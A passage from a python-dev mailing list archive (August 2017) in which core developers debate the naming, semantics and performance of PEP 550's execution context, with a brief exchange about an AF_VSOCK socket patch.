need the whole context, but if implemented as a > ChainMap (instead of per-key), I think you are a bit confused here (or I don't follow you) with the "per-key" ConceptKey design. With ConceptKeys: key = new_concept_key('spam') key.set('a') # EC = [..., {key: 'a'}] without: ec.set('key', 'a') # EC = [..., {'key': 'a'}] ConceptKey is an extra indirection layer that allows for granular caching and avoids the names clashing. > isn't that just a single constant? As > in, don't they always schedule to the same thread? And when they need > another map, isn't that because the required context is already > available from whichever code requested the scheduling? > >>> (A) How many values do you expect a typical generator to use? The >>> django survey suggested mostly 0, sometimes 1, occasionally 2. So >>> caching the values of all possible keys probably won't pay off. > >> Not many, but caching is still as important, because some API users >> want the "get()" operation to be as fast as possible under all >> conditions. > > Sure, but only because they view it as a hot path; if the cost of that > speedup is slowing down another hot path, like scheduling the > generator in the first place, it may not be worth it. > > According to the PEP timings, HAMT doesn't beat a copy-on-write dict > until over 100 items, and never beats a regular dict. That suggests > to me that it won't actually help the overall speed for a typical (as > opposed to worst-case) process. It's a bit more complicated, unfortunately. The "100 items" it true when we can just memcpy all keys/values of the dict when we want to clone it. I've proposed a patch to do that, and it works. The old implementation of "dict.copy()" created a new dict, iterated over items of the old dict, and inserted them to the new one. This 5x slower than memcpy. The subtle difference is that the memcpy implementation does not resize the dict. The resize is needed when we delete items from it (which will happen with EC). I've updated the chart to show what happens when we implement immutable dict with the current dict.copy() semantics: https://github.com/python/peps/blob/master/pep-0550-hamt_vs_dict.png The fundamental problem, though, is that EC is hidden from the user. Suppose you have a huge application (let's say new YouTube) that uses a multitude of libraries. You can then be in a situation that some of those libraries use the EC, and you actually have 100s of items in it. Now at least one LC in the chain is big, and its copying becomes expensive. You start to experience overhead -- sometimes setting a variable to the EC is expensive, sometime capturing the context takes longer, etc. HAMT guarantees that immutable dicts will have O(log N) performance for set() and merge (we will need to merge long chains from time to time, btw). This means that it's a future proof solution that works in all edge cases. > >>> And, of course, using a ChainMap means that the keys do NOT have to be >>> predefined ... so the Key class really can be skipped. > >> The first version of the PEP had no ContextKey object and the most >> popular complaint about it was that the key names will clash. > > That is true of any global registry. Thus the use of keys with > prefixes like com.sun. Such prefixes aren't considered Pythonic though. In the end, ContextKey is needed to give us O(1) get() operation (because of caching). This is a hard requirement, otherwise we can't migrate libraries like decimal to use this new API. > > The only thing pre-declaring a ContextKey buys in terms of clashes is > that a sophisticated scheduler would have less difficulty figuring out > which clashes will cause thrashing in the cache. I don't understand what you mean by "sophisticated scheduler". > > Or are you suggesting that the key can only be declared once (as > opposed to once per piece of code), so that the second framework to > use the same name will see a RuntimeError? ContextKey is declared once for the code that uses it. Nobody else will use that key. Keys have names only for introspection purposes, the implementation doesn't use it, iow: var = new_context_key('aaaaaa') var.set(1) # EC = [..., {var: 1}] # Note the that EC has a "var" object itself as the key in the mapping, not "aaaaa". Yury From yselivanov.ml at gmail.com Thu Aug 24 11:13:12 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Thu, 24 Aug 2017 11:13:12 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 10:38 AM, Barry Warsaw wrote: [..] I'll snip the naming discussion for now, I'm really curious to see what other people will say. > A different tack would more closely align with PEP 550?s heritage in thread-local storage, calling these things ?execution storage?. I think I read Guido suggest elsewhere using a namespace here so that in common code you?d only have to change the ?threading.local()? call to migrate to PEP 550. It might be neat if you could do something like: > > import execution > els = execution.local() > els.x = 1 A couple of relevant updates on this topic in old python-ideas threads (I'm not sure you've seen them): https://mail.python.org/pipermail/python-ideas/2017-August/046888.html https://mail.python.org/pipermail/python-ideas/2017-August/046889.html Unfortunately it's not feasible to re-use the "local()" idea for PEP 550. The "local()" semantics imposes many constraints and complexities to the design, while offering only "users already know it" argument for it. And even if we had "execution.local()" API, it would not be safe to always replace every "theading.local()" with it. Sometimes what you need is an actual TLS. Sometimes your design actually depends on it, even if you are not aware of that. Updating existing libraries to use PEP 550 should be a very conscious decision, simply because it has different semantics/guarantees. Y From ethan at stoneleaf.us Thu Aug 24 12:00:49 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Thu, 24 Aug 2017 09:00:49 -0700 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: <599EF831.6070306@stoneleaf.us> On 08/24/2017 06:52 AM, Barry Warsaw wrote: > To me, the functionality proposed in PEP 550 feels more like a "scope" > than a "context". Unlike a lexical scope, it can't be inferred from the > layout of the source code. It's more of a dynamic "execution scope" and > the stacking of "local execution scopes" reinforces that for me. You > use a key to find a value in the current execution scope, and it chains > up until the key is found or you've reached the top of the local > execution (defined as the thread start, etc.). Scope and dynamic certainly feel like the important concepts in PEP 550, and Guido (IIRC) has already said these functions do not belong in contextlib, so context may not be a good piece of the name. Some various ideas: - ExecutionScope, LocalScope - DynamicScope, ScopeLocals - DynamicExecutionScope, DynamicLocals - DynamicExecutionScope, ExecutionLocals - DynamicExecutionScope, ScopeLocals -- ~Ethan~ From ericsnowcurrently at gmail.com Thu Aug 24 12:44:19 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Thu, 24 Aug 2017 10:44:19 -0600 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 7:52 AM, Barry Warsaw wrote: > Guido van Rossum wrote: >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> I worry that that's going to lead more people astray thinking this has >> something to do with contextlib, which it really doesn't (it's much more >> closely related to threading.local()). > > This is my problem with using "Context" for this PEP. Although I can't > keep up with all names being thrown around, it seems to me that in > Python we already have a well-established meaning for "contexts" -- > context managers, and the protocols they implement as they participate > in `with` statements. We have contextlib which reinforces this. What's > being proposed in PEP 550 is so far removed from this concept that I > think it's just going to cause confusion (well, it does in me anyway!). The precedent (and perhaps inspiration) here lies in decimal.context [1] and ssl.SSLContext [2]. email.Policy [3] qualifies in spirit, as does the import state [4]. Each encapsulates the state of some subsystem. They can be enabled in the current thread via a context manager. (Well, only the first two, but the latter two are strong candidates.) They are each specific to a *logical* execution context. Most notably, each is implicit global state in the current thread of execution. PEP 550, if I've understood right, is all about supporting these contexts in other logical threads of execution than just Python/OS threads (e.g. async, generators). Given all that, "context" is an understandable name to use here. Personally, I'm still on the fence on if "context" fits in the name. :) None of the proposed names have felt quite right thus far, which is probably why we're still talking about it! :) > > To me, the functionality proposed in PEP 550 feels more like a "scope" > than a "context". Unlike a lexical scope, it can't be inferred from the > layout of the source code. It's more of a dynamic "execution scope" and > the stacking of "local execution scopes" reinforces that for me. You > use a key to find a value in the current execution scope, and it chains > up until the key is found or you've reached the top of the local > execution (defined as the thread start, etc.). "scope" fits because it's all about chained lookup in implicit namespaces. However, to me the focus of PEP 550 is on the context (encapsulated state) more than the chaining. > > One other suggestion: maybe we shouldn't put these new functions in sys, > but instead put them in their own module? It feels analogous to the gc > module; all those functions could have gone in sys since they query and > effect the Python runtime system, but it makes more sense (and improves > the naming) by putting them in their own module. It also segregates the > functionality so that sys doesn't become a catchall that overloads you > when you're reading through the sys module documentation. +1 -eric [1] https://docs.python.org/3/library/ssl.html#ssl.SSLContext [2] https://docs.python.org/3/library/decimal.html#context-objects [3] https://docs.python.org/3/library/email.policy.html [4] https://www.python.org/dev/peps/pep-0406/ From ericsnowcurrently at gmail.com Thu Aug 24 12:55:05 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Thu, 24 Aug 2017 10:55:05 -0600 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On Thu, Aug 24, 2017 at 8:23 AM, Yury Selivanov wrote: > Contrary to scoping, the programmer is much less likely to deal with > Execution Context. How often do we use "threading.local()"? This is an important point. PEP 550 is targeting library authors, right? Most folks will not be interacting with the new functionality except perhaps indirectly via context managers. So I'm not convinced that naming collisions with more commonly used concepts is as much a concern, particularly because of conceptual similarity. However, if the functionality of the PEP would be used more commonly then the naming would be a stronger concern. -eric From cavery at redhat.com Thu Aug 24 13:45:36 2017 From: cavery at redhat.com (Cathy Avery) Date: Thu, 24 Aug 2017 13:45:36 -0400 Subject: [Python-Dev] python issue27584 AF_VSOCK support In-Reply-To: References: <59958A4F.30207@redhat.com> Message-ID: <599F10C0.6050903@redhat.com> On 08/17/2017 05:38 PM, Christian Heimes wrote: > On 2017-08-17 14:21, Cathy Avery wrote: >> Hi, >> >> I have a python pull request https://github.com/python/cpython/pull/2489 >> that introduces AF_VSOCK to the python C socket module. Unfortunately >> things have gone quiet for several weeks. Since I am new to this process >> I am unclear on what to expect as the next steps. I believe I have >> addressed all issues. If I am mistaken please let me know. A real >> functioning test setup is a bit painful and I would be happy to help in >> anyway I can. The Microsoft Hyper V team is now introducing support of >> vsock in the upstream linux kernel so its adoption is spreading amongst >> the various hypervisors. >> >> Any guidance on the basic timelines would be very helpful. > Hi Cathy, > > thanks for your contribution! Your patch looks mostly fine. I pointed > out some minor issues in my review. > > Regards, > Christian > > > Thanks! I'm going to push it soon. I think I got everything. From francismb at email.de Thu Aug 24 16:01:13 2017 From: francismb at email.de (francismb) Date: Thu, 24 Aug 2017 22:01:13 +0200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> Hi, On 08/24/2017 03:52 PM, Barry Warsaw wrote: > Guido van Rossum wrote: >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> I worry that that's going to lead more people astray thinking this has >> something to do with contextlib, which it really doesn't (it's much more >> closely related to threading.local()). > If it's hard to find a name due collision with related meanings or already taken buckets then I would suggest just inventing a new word. An artificial one. What do you thing? Thanks, --francis From barry at python.org Thu Aug 24 17:06:09 2017 From: barry at python.org (Barry Warsaw) Date: Thu, 24 Aug 2017 17:06:09 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> References: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> Message-ID: On Aug 24, 2017, at 16:01, francismb wrote: > On 08/24/2017 03:52 PM, Barry Warsaw wrote: >> Guido van Rossum wrote: >>> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >>> >>> I worry that that's going to lead more people astray thinking this has >>> something to do with contextlib, which it really doesn't (it's much more >>> closely related to threading.local()). >> > If it's hard to find a name due collision with related meanings or > already taken buckets then I would suggest just inventing a new word. An > artificial one. > > What do you thing? I propose RaymondLuxuryYach_t, but we?ll have to pronounce it ThroatwobblerMangrove. import-dinsdale-ly y?rs, -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: Message signed with OpenPGP URL: From solipsis at pitrou.net Thu Aug 24 17:32:21 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Thu, 24 Aug 2017 23:32:21 +0200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) References: <5ab66d01-3493-c400-b953-3896452b67b0@email.de> Message-ID: <20170824233221.76ff8934@fsol> On Thu, 24 Aug 2017 17:06:09 -0400 Barry Warsaw wrote: > On Aug 24, 2017, at 16:01, francismb wrote: > > On 08/24/2017 03:52 PM, Barry Warsaw wrote: > >> Guido van Rossum wrote: > >>> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: > >>> > >>> I worry that that's going to lead more people astray thinking this has > >>> something to do with contextlib, which it really doesn't (it's much more > >>> closely related to threading.local()). > >> > > If it's hard to find a name due collision with related meanings or > > already taken buckets then I would suggest just inventing a new word. An > > artificial one. > > > > What do you thing? > > I propose RaymondLuxuryYach_t, but we?ll have to pronounce it ThroatwobblerMangrove. Sorry, but I think we should prononce it ThroatwobblerMangrove. Regards Antoine. From ericsnowcurrently at gmail.com Thu Aug 24 18:47:20 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Thu, 24 Aug 2017 16:47:20 -0600 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> <599E0610.7090508@stoneleaf.us> Message-ID: On Thu, Aug 24, 2017 at 5:37 AM, Nick Coghlan wrote: > Migrating a (variant of a) naming subthread from python-ideas over to > here, does the following sound plausible to anyone else?: > > ContextLocal - read/write access API (via get()/set() methods) > ContextLocalNamespace - active mapping that CL.get()/set() manipulates > ExecutionContext - current stack of context local namespaces Overall it makes sense. The following derivative might be more clear: ContextLocal ContextLocals ChainedContextLocals (or some variation explicitly calling out the chaining) Alternatively, similar to other suggestions: ContextVar ContextVars ChainedContextVars I also think "state" helps disambiguate "context": ContextVar ContextState ChainedContextState or: ContextVar ContextVars ContextState (perhaps a little too ambiguous without the explicit "chained") -eric From greg.ewing at canterbury.ac.nz Thu Aug 24 19:34:48 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Fri, 25 Aug 2017 11:34:48 +1200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: <599F6298.6080704@canterbury.ac.nz> Barry Warsaw wrote: > This is my problem with using "Context" for this PEP. Although I can't > keep up with all names being thrown around, Not sure whether it helps, but a similar concept in some Scheme dialects is called a "fluid binding". e.g. Section 5.4 of http://www.scheme.com/csug8/binding.html It's not quite the same thing as we're talking about here (the names bound exist in the normal name lookup scope rather than a separate namespace) but maybe some of the terminology could be adapted. -- Greg From greg.ewing at canterbury.ac.nz Thu Aug 24 19:58:32 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Fri, 25 Aug 2017 11:58:32 +1200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: <599F6828.9020609@canterbury.ac.nz> Barry Warsaw wrote: > I actually > think Python?s scoping rules are fairly easy to grasp, The problem is that the word "scope", as generally used in relation to programming languages, has to do with visibility of names. A variable is "in scope" at a particular point in the code if you can acccess it just by writing its name there. The things we're talking about are never "in scope" in that sense. What we have is something similar to a dynamic scope, but a special action is required to access bindings in it. I can't think of any established term for things like that. The closest I'ves seen is one dialect of Scheme that called it a "fluid environment". In that dialect, fluid-let didn't create bindings in the normal scope, and you had to use specific functions to access them. -- Greg From ncoghlan at gmail.com Fri Aug 25 00:55:43 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Fri, 25 Aug 2017 14:55:43 +1000 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> <599E0610.7090508@stoneleaf.us> Message-ID: On 25 August 2017 at 01:00, Guido van Rossum wrote: > It shouldn't be called a namespace unless the dominant access is via > attributes. That makes sense. Since the main purpose of that part of the Python API is to offer an opaque handle to where the context locals store their values, something semantically neutral like "State" may work: - ContextLocal: read/write API - ContextLocalState: where ContextLocal instances actually store things - ExecutionContext: nested stack of context local states The attribute on generators and coroutines could then be called "__context_locals__", and that would either be None (indicating that any context local references will just use the already active context local storage), or else it would be set to a ContextLocalState instance (indicate that starting & stopping the operation will push & pop the given context local state). Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From guido at python.org Fri Aug 25 01:21:09 2017 From: guido at python.org (Guido van Rossum) Date: Thu, 24 Aug 2017 22:21:09 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> <20170823185641.50393e4b@fsol> <599DD2C2.2010402@stoneleaf.us> <599E0610.7090508@stoneleaf.us> Message-ID: I think we should let the naming issue go for now, while Yury et al. are rewriting the PEP. We'll revisit it after we're more comfortable with the semantics. On Thu, Aug 24, 2017 at 9:55 PM, Nick Coghlan wrote: > On 25 August 2017 at 01:00, Guido van Rossum wrote: > > It shouldn't be called a namespace unless the dominant access is via > > attributes. > > That makes sense. > > Since the main purpose of that part of the Python API is to offer an > opaque handle to where the context locals store their values, > something semantically neutral like "State" may work: > > - ContextLocal: read/write API > - ContextLocalState: where ContextLocal instances actually store things > - ExecutionContext: nested stack of context local states > > The attribute on generators and coroutines could then be called > "__context_locals__", and that would either be None (indicating that > any context local references will just use the already active context > local storage), or else it would be set to a ContextLocalState > instance (indicate that starting & stopping the operation will push & > pop the given context local state). > > Cheers, > Nick. > > -- > Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia > -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From ncoghlan at gmail.com Fri Aug 25 01:36:55 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Fri, 25 Aug 2017 15:36:55 +1000 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: Message-ID: On 24 August 2017 at 23:52, Barry Warsaw wrote: > Guido van Rossum wrote: >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> I worry that that's going to lead more people astray thinking this has >> something to do with contextlib, which it really doesn't (it's much more >> closely related to threading.local()). > > This is my problem with using "Context" for this PEP. Although I can't > keep up with all names being thrown around, it seems to me that in > Python we already have a well-established meaning for "contexts" -- > context managers, and the protocols they implement as they participate > in `with` statements. We have contextlib which reinforces this. What's > being proposed in PEP 550 is so far removed from this concept that I > think it's just going to cause confusion (well, it does in me anyway!). While I understand the concern, I think context locals and contextlib are more closely related than folks realise, as one of the main problems that the PEP is aiming to solve is that with statements (and hence context managers) *do not work as expected* when their body includes "yield", "yield from" or "await" . The reason they don't work reliably is because in the absence of frame hacks, context managers are currently limited to manipulating process global and thread local state - there's no current notion of context local storage that interacts nicely with the frame suspension keywords. And hence in the absence of any support for context local state, any state changes made by context managers tend to remain in effect *even if the frame that entered the context manager gets suspended*. Context local state makes it possible to solve that problem, as it means that encountering one of the frame suspension keywords in the body of a with statement will implicitly revert all changes made to context local variables until such time as that particular frame is resumed, and you have to explicitly opt-in on a per-instance basis to instead allow those state changes to affect the calling context that's suspending & resuming the frame. That said, I can also see Guido's point that the proposed new APIs have a very different flavour to the existing APIs in contextlib, so it doesn't necessarily make sense to use that module directly. Building on the "context locals" naming scheme I've been discussing elsewhere, one possible name for a dedicated module would be "contextlocals" giving: # Read/write access to individual context locals * context_var = contextlocals.new_context_local(name: str='...') # Context local storage manipulation * context = contextlocals.new_context_local_state() * contextlocals.run_with_context_locals(context: ContextLocalState, func, *args, **kwargs). * __context_locals__ attribute on generators and coroutines # Overall execution context manipulation * current_ec = contextlocals.get_execution_context() * new_ec = contextlocals.new_execution_context() * contextlocals.run_with_execution_context(ec: ExecutionContext, func, *args, **kwargs). The remaining connection with "contextlib" would be that @contextlib.contextmanager (and its async counterpart) would implicitly clear the __context_locals__ attribute on the underlying generator instance so that context local state changes made there will affect the context where the context manager is actually being used. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From solipsis at pitrou.net Fri Aug 25 06:28:08 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Fri, 25 Aug 2017 12:28:08 +0200 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) References: Message-ID: <20170825122808.59dd6a6f@fsol> On Fri, 25 Aug 2017 15:36:55 +1000 Nick Coghlan wrote: > On 24 August 2017 at 23:52, Barry Warsaw wrote: > > Guido van Rossum wrote: > >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: > >> > >> I worry that that's going to lead more people astray thinking this has > >> something to do with contextlib, which it really doesn't (it's much more > >> closely related to threading.local()). > > > > This is my problem with using "Context" for this PEP. Although I can't > > keep up with all names being thrown around, it seems to me that in > > Python we already have a well-established meaning for "contexts" -- > > context managers, and the protocols they implement as they participate > > in `with` statements. We have contextlib which reinforces this. What's > > being proposed in PEP 550 is so far removed from this concept that I > > think it's just going to cause confusion (well, it does in me anyway!). > > While I understand the concern, I think context locals and contextlib > are more closely related than folks realise, as one of the main > problems that the PEP is aiming to solve is that with statements (and > hence context managers) *do not work as expected* when their body > includes "yield", "yield from" or "await" . If I write: def read_chunks(fn, chunk_size=8192): with open(fn, "rb") as f: while True: data = f.read(chunk_size) if not data: break yield data The "with" statement here works fine even though its body includes a "yield" (and if there had been an added "await" things would probably not be different). The class of context managers you're talking about is in my experience a small minority (I've hardly ever used them myself, and I don't think I have ever written one). So I don't think the two concepts are as closely related as you seem to think. That said, I also think "context" is the best term (barring "environment" perhaps) to describe what PEP 550 is talking about. Qualifying it ("logical", etc.) helps disambiguate Regards Antoine. From ncoghlan at gmail.com Fri Aug 25 09:23:52 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Fri, 25 Aug 2017 23:23:52 +1000 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: <20170825122808.59dd6a6f@fsol> References: <20170825122808.59dd6a6f@fsol> Message-ID: On 25 August 2017 at 20:28, Antoine Pitrou wrote: > On Fri, 25 Aug 2017 15:36:55 +1000 > Nick Coghlan wrote: >> On 24 August 2017 at 23:52, Barry Warsaw wrote: >> > Guido van Rossum wrote: >> >> On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> >> >> I worry that that's going to lead more people astray thinking this has >> >> something to do with contextlib, which it really doesn't (it's much more >> >> closely related to threading.local()). >> > >> > This is my problem with using "Context" for this PEP. Although I can't >> > keep up with all names being thrown around, it seems to me that in >> > Python we already have a well-established meaning for "contexts" -- >> > context managers, and the protocols they implement as they participate >> > in `with` statements. We have contextlib which reinforces this. What's >> > being proposed in PEP 550 is so far removed from this concept that I >> > think it's just going to cause confusion (well, it does in me anyway!). >> >> While I understand the concern, I think context locals and contextlib >> are more closely related than folks realise, as one of the main >> problems that the PEP is aiming to solve is that with statements (and >> hence context managers) *do not work as expected* when their body >> includes "yield", "yield from" or "await" . > > If I write: > > def read_chunks(fn, chunk_size=8192): > with open(fn, "rb") as f: > while True: > data = f.read(chunk_size) > if not data: > break > yield data > > The "with" statement here works fine even though its body includes a > "yield" (and if there had been an added "await" things would probably > not be different). > > The class of context managers you're talking about is in my experience a > small minority (I've hardly ever used them myself, and I don't think I > have ever written one). I actually agree with this, as the vast majority of context managers are about managing the state of frame locals, rather than messing about with implicitly shared state. It's similar to the way that thread locals are vastly outnumbered by ordinary frame locals. That's part of what motivated my suggested distinction between explicit context (such as your example here) and implicit context (the trickier cases that PEP 550 aims to help handle). > So I don't think the two concepts are as > closely related as you seem to think. Of the 12 examples in https://www.python.org/dev/peps/pep-0343/#examples, two of them related to manipulating the decimal thread local context, and a third relates to manipulating a hidden "queue signals for later or process them immediately?" flag, so the use cases that PEP 550 covers have always been an intended subset of the use cases the PEP 343 covers. It's just that the explicit use cases either already work sensibly in the face of frame suspension (e.g. keeping a file open, since you're still using it), or have other reasons why you wouldn't want to suspend the frame after entering that particular context (e.g. if you suspend a frame with a lock held, there's no real way for the interpreter to guess whether that's intentional or not, so it has to assume keeping it locked is intentional, and expect you to release it explicitly if that's what you want) And while PEP 550 doesn't handle the stream redirection case natively (since it doesn't allow for suspend/resume callbacks the way PEP 525 does), it at least allows for the development of a context-aware output stream wrapper API where: * you replace the target stream globally with a context-aware wrapper that delegates attribute access to a particular context local if that's set and to the original stream otherwise * you have a context manager that sets & reverts the context local variable rather than manipulating the process global state directly > That said, I also think "context" is the best term (barring > "environment" perhaps) to describe what PEP 550 is talking about. > Qualifying it ("logical", etc.) helps disambiguate +1 Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From yselivanov.ml at gmail.com Fri Aug 25 09:36:58 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Fri, 25 Aug 2017 09:36:58 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> Message-ID: On Fri, Aug 25, 2017 at 9:23 AM, Nick Coghlan wrote: [..] > And while PEP 550 doesn't handle the stream redirection case natively > (since it doesn't allow for suspend/resume callbacks the way PEP 525 > does), it at least allows for the development of a context-aware > output stream wrapper API where: PEP 525 can't handle streams redirection -- it can do it only for single-threaded programs. sys.stdout/stderr/stdin are global variables, that's how the API is specified. API users assume that the change is process-wide. Yury From ncoghlan at gmail.com Fri Aug 25 09:48:25 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Fri, 25 Aug 2017 23:48:25 +1000 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> Message-ID: On 25 August 2017 at 23:36, Yury Selivanov wrote: > On Fri, Aug 25, 2017 at 9:23 AM, Nick Coghlan wrote: > [..] >> And while PEP 550 doesn't handle the stream redirection case natively >> (since it doesn't allow for suspend/resume callbacks the way PEP 525 >> does), it at least allows for the development of a context-aware >> output stream wrapper API where: > > PEP 525 can't handle streams redirection -- it can do it only for > single-threaded programs. Good point, whereas the hypothetical context-aware wrapper I proposed would be both thread-safe (since the process global would be changed once before the program went multi-threaded and then left alone) *and* potentially lower overhead (one context local lookup per stream attribute access, rather than a global state change every time a frame was suspended or resumed with a stream redirected) > sys.stdout/stderr/stdin are global variables, that's how the API is > specified. API users assume that the change is process-wide. Yeah, I wasn't suggesting any implicit changes to the way those work. However, it does occur to me that if we did add a new "contextlocals" API, then: 1. It could offer context-aware wrappers for stdin/stdout/stderr 2. If could offer context-aware alternatives to the stream redirection context managers in contextlib That approach would work even better than replacing sys.stdin/out/err themselves with wrappers since the wrappers wouldn't be vulnerable to being overwritten by other code that mutated the sys module. Anyway, that's not a serious proposal right now, but I do think it's decent validation of the power and flexibility of the proposed implicit state management model. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From yselivanov.ml at gmail.com Fri Aug 25 10:18:55 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Fri, 25 Aug 2017 10:18:55 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> Message-ID: Right, Nick, I missed the part that you want to have a file-like wrapper stored in sys.std* streams that would redirect lookups/calls to the relevant real file-object in the current context (correct?) I has a similar idea when I discovered that PEP 550 can't be used directly to fix sys.std* streams redirection. Another idea: 1. We alter PyModule to make it possible to add properties (descriptor protocol, or we implement custom __getattr__). I think we can make it so that only sys module would be able to actually use it, so it's not going to be a new feature -- just a hack for CPython. 2. We make sys.std* attributes properties, with getters and setters. 3. sys.std* setters will: issue a DeprecationWarning; set whatever the user wants to set in a global variable + set a flag (let's call it "sys.__stdout_global_modified") that sys.std* were modified. 4. sys.std* getters will use PEP 550 to lookup when __stdout_global_modified is false. If it's true -- we fallback to globals. 5. We deprecate the current API and add new APIs for the redirection system that uses PEP 550 explicitly. 6. In Python 4 we remove the old sys.std* API. Thit is still *very* fragile: any code that writes to sys.stdout breaks all assumptions. But it offers a way to raise a warning when old-API is being used - something that we'll probably need if we add new APIs to fix this problem. Yury From barry at python.org Fri Aug 25 11:10:30 2017 From: barry at python.org (Barry Warsaw) Date: Fri, 25 Aug 2017 11:10:30 -0400 Subject: [Python-Dev] Scope, not context? (was Re: PEP 550 v3 naming) In-Reply-To: References: <20170825122808.59dd6a6f@fsol> Message-ID: <638C37AA-1E55-46DC-9017-4E94B222F89C@python.org> On Aug 25, 2017, at 10:18, Yury Selivanov wrote: > > I has a similar idea when I discovered that PEP 550 can't be used > directly to fix sys.std* streams redirection. Another idea: > > 1. We alter PyModule to make it possible to add properties (descriptor > protocol, or we implement custom __getattr__). I think we can make it > so that only sys module would be able to actually use it, so it's not > going to be a new feature -- just a hack for CPython. > > 2. We make sys.std* attributes properties, with getters and setters. > > 3. sys.std* setters will: issue a DeprecationWarning; set whatever the > user wants to set in a global variable + set a flag (let's call it > "sys.__stdout_global_modified") that sys.std* were modified. > > 4. sys.std* getters will use PEP 550 to lookup when > __stdout_global_modified is false. If it's true -- we fallback to > globals. > > 5. We deprecate the current API and add new APIs for the redirection > system that uses PEP 550 explicitly. > > 6. In Python 4 we remove the old sys.std* API. > > Thit is still *very* fragile: any code that writes to sys.stdout > breaks all assumptions. But it offers a way to raise a warning when > old-API is being used - something that we'll probably need if we add > new APIs to fix this problem. It?s ideas like this that do make me think of scopes when talking about global state and execution contexts. I understand that the current PEP 550 invokes an explicit separate namespace, but thinking bigger, if the usual patterns of just writing to sys.std{out,err} still worked and in the presence of single ?threaded? execution it just did the normal thing, but in the presence of threads, async, etc. it *also* did the right thing, then code wouldn?t need to change just because you started to adopt async. That implies some scoping rules to make ?sys.stdout? refer to the local execution?s sys.stdout if it were set, and the global sys.stdout if it were not. This would of course be a much deeper change to Python, with lots of tricky semantics and corner cases to get right. But it might be worth it to provide an execution model and an API that would be harder to get wrong because Python just Does the Right Thing. It?s difficult because you also have to be able to reason about what?s going on, and it?ll be imperative to be able to debug and examine the state of your execution when things go unexpected. That?s always harder when mixing dynamic scope with lexical scope, which I think is what PEP 550 is ultimately getting at. Cheers, -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: Message signed with OpenPGP URL: From ericsnowcurrently at gmail.com Fri Aug 25 11:15:03 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Fri, 25 Aug 2017 09:15:03 